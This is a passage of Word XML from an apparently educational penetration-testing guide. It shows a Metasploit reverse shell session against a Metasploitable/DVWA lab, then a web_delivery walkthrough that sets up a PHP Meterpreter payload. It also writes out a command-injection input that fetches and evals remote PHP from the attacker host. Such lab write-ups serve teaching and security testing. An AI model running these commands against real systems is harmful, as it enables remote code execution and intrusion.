    <w:p w14:paraId="47E7D89E" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246E0E73" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2D1E95" w14:textId="79516763" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:4321 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FAF493" w14:textId="25063F40" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Command shell session 8 opened (</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:4321 -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:56961) at 2018-06-27 15:23:43 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548578F4" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F7E0268" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402F1A7C" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A17E48E" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A80FCD" w14:textId="5E4AAAF9" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718DF236" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRPr="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1772FAC0" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python -c 'import pty; pty.spawn("/bin/bash")'    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A51F8" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7761A" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777AA992" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uid=33(www-data) gid=33(www-data) groups=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD494FD" w14:textId="37C8360F" w:rsidR="00EB62A8" w:rsidRPr="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A11A425" w14:textId="286826A8" w:rsidR="00C613A8" w:rsidRDefault="00981DA3" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Using Metasploit w</w:t>
      </w:r>
      <w:r w:rsidR="00B00BCC">
        <w:t>eb d</w:t>
      </w:r>
      <w:r>
        <w:t>elivery feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9FD35F" w14:textId="15F3D894" w:rsidR="00A75F80" w:rsidRDefault="00B0698E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit provides a way to deliver payload on the server</w:t>
      </w:r>
      <w:r w:rsidR="00EB62A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A7225">
        <w:t>by hos</w:t>
      </w:r>
      <w:r w:rsidR="00EB62A8">
        <w:t>ting it on the attacker machine. Once downloaded and executed, this will</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> conne</w:t>
      </w:r>
      <w:r w:rsidR="00EB62A8">
        <w:t>ct back to the attacker machine (or open a bind shell, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED2A35" w14:textId="5FAD2BE7" w:rsidR="003A7225" w:rsidRDefault="003A7225" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>First, the payload is created and hosted on the attacker machine (here a reverse_tcp meterpreter is used).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D51B466" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf &gt; use exploit/multi/script/web_delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72829D25" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/script/web_delivery) &gt; set PAYLOAD php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D38A75" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PAYLOAD =&gt; php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29736147" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/script/web_delivery) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A67B22A" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072AD924" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Module options (exploit/multi/script/web_delivery):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8F26D" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD909DA" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name     Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035BCA43" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----     ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736B2C8D" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7199109C" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SRVPORT  8080             yes       The local port to listen on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181F2663" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SSL      false            no        Negotiate SSL for incoming connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E106539" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560843ED" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   URIPATH                   no        The URI to use for this exploit (default is random)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622BDA2" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD19DDB" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA1C8A0" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Payload options (php/meterpreter/reverse_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429A9BCF" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40582D70" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D40858" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E50C59A" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LHOST                   yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB9702C" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LPORT  4444             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24112FE9" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4267D503" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2463A5FD" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE3A2D8" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40EAFA55" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11925BC2" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D6E2E4" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   0   Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCB0E41" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44EED41E" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194C4A28" w14:textId="4F1933F5" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf exploit(multi/script/web_delivery) &gt; set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC5B068" w14:textId="1AAB0362" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LHOST =&gt; </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D5163" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/script/web_delivery) &gt; set TARGET 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F80102" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>TARGET =&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E76E72" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2084F43E" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/script/web_delivery) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279AA66C" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Exploit running as background job 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EF440A" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6012266C" w14:textId="76503EFB" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3358E191" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/script/web_delivery) &gt; [*] Using URL: http://0.0.0.0:8080/F7WWKy48FM3t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D23377" w14:textId="654B566F" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Local IP: http://</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t>:8080/F7WWKy48FM3t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D5A7C" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Server started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3555236F" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Run the following command on the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D759E" w14:textId="278A9B46" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>php -d allow_url_fopen=true -r "eval(file_get_contents('http://</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t>:8080/F7WWKy48FM3t'));"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8D4E50" w14:textId="77777777" w:rsidR="003B003E" w:rsidRDefault="003B003E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CBE322" w14:textId="4CA0453F" w:rsidR="003A7225" w:rsidRDefault="00EB62A8" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit is now waiting for the target to connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6BA5CE" w14:textId="75D62D3F" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>On the web application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3492B9C1" w14:textId="6CCA4D3D" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB62A8">
        <w:t xml:space="preserve"> php -d allow_url_fopen=true -r "eval(file_get_contents('http://</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB62A8">
        <w:t>:8080/F7WWKy48FM3t'));"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392C4EDF" w14:textId="77777777" w:rsidR="003B003E" w:rsidRDefault="003B003E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ABDA759" w14:textId="162233DC" w:rsidR="00E0785D" w:rsidRDefault="00EB62A8" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>That is it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C0BDFC" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/script/web_delivery) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E453E5E" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Exploit running as background job 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71768379" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A9EA560" w14:textId="7255DFBD" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B4DC8" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/script/web_delivery) &gt; [*] Using URL: http://0.0.0.0:8080/F7WWKy48FM3t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7523DFCC" w14:textId="26327F35" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Local IP: http://</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t>:8080/F7WWKy48FM3t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D95C2" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Server started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47772F08" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Run the following command on the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425433FA" w14:textId="08C23E9A" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>php -d allow_url_fopen=true -r "eval(file_get_contents('http://</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t>:8080/F7WWKy48FM3t'));"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335AD124" w14:textId="7345CC1B" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    web_delivery - Delivering Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E162B51" w14:textId="35364F6D" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Sending stage (37775 bytes) to </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C6CDDF" w14:textId="16BD817F" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Meterpreter session 10 opened (</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:4444 -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:56842) at 2018-06-27 16:15:59 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451BFC9E" w14:textId="77777777" w:rsidR="003B003E" w:rsidRPr="003B003E" w:rsidRDefault="003B003E" w:rsidP="003B003E">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB709E5" w14:textId="5BD1FEB1" w:rsidR="00C15A55" w:rsidRDefault="00C15A55" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc26269450"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation – Network vector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2224AE02" w14:textId="2F5BD98A" w:rsidR="00496815" w:rsidRPr="00496815" w:rsidRDefault="00283B44" w:rsidP="00496815">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Web applications are not the only way for an attacker to get an access to a company</w:t>
      </w:r>
      <w:r w:rsidR="00DA7306">
        <w:t>’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> internal network. </w:t>
      </w:r>
      <w:r w:rsidR="008512CC">
        <w:t>For instance, a malicious employee can also intend some actions from the inside. If an attacker managed to get a physical access to the company’s offices (e.g. using social engineering), he can use the Ethernet to gain access to the internal network.</w:t>
      </w:r>
      <w:r w:rsidR="004A10BF">
        <w:t xml:space="preserve"> Wi-Fi is also another way to trick an employee and to steal its </w:t>
      </w:r>
      <w:r w:rsidR="00402BB3">
        <w:t>credentials, which</w:t>
      </w:r>
